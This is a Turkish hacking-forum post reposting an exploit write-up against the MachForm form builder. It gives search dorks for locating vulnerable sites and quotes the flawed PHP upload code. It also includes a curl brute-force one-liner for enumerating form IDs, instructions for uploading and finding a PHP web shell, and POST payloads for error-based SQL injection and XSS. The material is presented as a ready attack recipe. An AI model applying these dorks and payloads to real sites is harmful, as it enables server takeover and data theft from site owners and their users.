İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Shell Upload & SQL Injection

06-07-2013 08:57
#1
S4cuRiTy EneMy - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
04/2012
Nereden:
root@server
Yaş:
24
Mesajlar:
8.801
Teşekkür (Etti):
968
Teşekkür (Aldı):
3104
Konular:
1516
Ticaret:
(0) %

Dorklar ; # Dork1: "Powered by MachForm" id=
# Dork2: formularios/view.php?id=
# Dork3: inurl:machform/view.php?id=

Kod:
# Dork1: "Powered by MachForm" id=
# Dork2: formularios/view.php?id=
# Dork3: inurl:machform/view.php?id=
Demonstration clip: http://y-shahinzadeh.ir/tutorial/machform.rar
Summary:
========
1. Arbitrary file upload
2. MySQL Injection (Error based) and XSS


1. Arbitrary file upload:
=========================

...
...
if(!empty($uploaded_files)){
foreach ($uploaded_files as $element_name){
if(empty($form_review)){
//move file and check for invalid file
$destination_file =
$input['machform_data_path'].DATA_DIR."/form_{$form_id}/files/{$element_name}-{$record_insert_id}-{$_FILES[$element
_name]['name']}";
if (move_uploaded_file($_FILES[$element_name]['tmp_name'], $destination_file)) {
$filename = mysql_real_escape_string($_FILES[$element_name]['name']);
$query = "update ap_form_{$form_id} set
$element_name='{$element_name}-{$record_insert_id}-{$filename}' where id='$record_insert_id'";
do_query($query);
}
}else{
//for form with review enabled, append .tmp suffix to all uploaded files
//move file and check for invalid file
$destination_file =
$input['machform_data_path'].DATA_DIR."/form_{$form_id}/files/{$element_name}-{$record_insert_id}-{$_FILES[$element
_name]['name']}.tmp";
if (move_uploaded_file($_FILES[$element_name]['tmp_name'], $destination_file)) {
$filename = mysql_real_escape_string($_FILES[$element_name]['name']);
$query = "update ap_form_{$form_id}_review set
$element_name='{$element_name}-{$record_insert_id}-{$filename}' where id='$record_insert_id'";
do_query($query);
}

if(!empty($uploaded_file_lookup[$element_name])){
unset($uploaded_file_lookup[$element_name]);
}
}
}
}
...
...

Exploit:

In beginning, the hacker must aim view.php located at the root of site, observing the lines inside of mentioned file
would be a big lead to disclosure of vulnerability:

$input_array = ap_sanitize_input($_POST);
$submit_result = process_form($input_array);

These two lines have functions leading to have both MySQL injection and Arbitrary file upload vulnerability. I’m not
going to audit codes, I may just illustrate the attack started by applying brute-force procedure on ID parameter so as
to find a form consisting file upload form, it can be achieved by any program, I just issued a Linux command helped me
find it properly:

seq 1 500 | xargs -I XX -P32 curl -s http://target/view.php=XX -o XX.out
grep “type=\”file\”" *.out

Afterwards, an HTML element followed by “for=”(.*)” must be specified, picture below gives better concept:

http://blog.y-shahinzadeh.ir/posts-images/machform/7.jpg

All have to be done is uploading PHP shell, and trying to find its name on server. The file will be uploaded in the
path:

http://target.com/data/form_[ID]/[element name]-[mysql_insert_id()].php

In URL above, [ID] is gathered in brute-force phase, [element name] is gathered by viewing HTML source, and
[mysql_insert_id()] should be brute-forced again. Being relatively difficult, I’ve recorded a clip demonstrating what
I’ve said:

http://y-shahinzadeh.ir/tutorial/machform.rar

2. MySQL Injection (Error based) and XSS:
=========================================
...
...
$input_array = ap_sanitize_input($_POST);
...
...


Exploit (POST to view.php after finding HTML elements):

element_1=1&element_2=’&element_3=1&form_id=11&submit=1
element_1=1&element_2=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28949236%29%3c%2fScRiPt%3​e&element_3=1&form_i
d=11&submit=Enviar



Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı